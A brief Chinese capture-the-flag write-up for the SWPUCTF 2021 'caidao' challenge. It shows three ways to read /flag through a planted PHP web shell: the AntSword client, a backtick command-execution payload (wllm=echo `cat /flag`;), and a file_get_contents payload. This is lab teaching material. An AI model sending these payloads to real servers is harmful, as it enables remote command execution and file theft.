[SWPUCTF 2021 新生赛]caidao

点开发现需要我们进行POST传参
[SWPUCTF 2021 新生赛]caidao_第1张图片

方法一:

用蚁剑直接连接

在根目录下找到flag
[SWPUCTF 2021 新生赛]caidao_第2张图片

方法二:

构造payload

wllm=echo `cat /flag`;
因为` `内的内容相当于执行系统命令
(也可以位为echo `tac /flag`)

[SWPUCTF 2021 新生赛]caidao_第3张图片

即可得到flag

[SWPUCTF 2021 新生赛]caidao_第4张图片
方法三:

运用函数
构造payload

wllm=var_dump(file_get_contents("/flag"));

注:var_dump()函数用于输出变量的相关信息
file_get_contents()函数用于读取文件

你可能感兴趣的:(命令执行,web安全)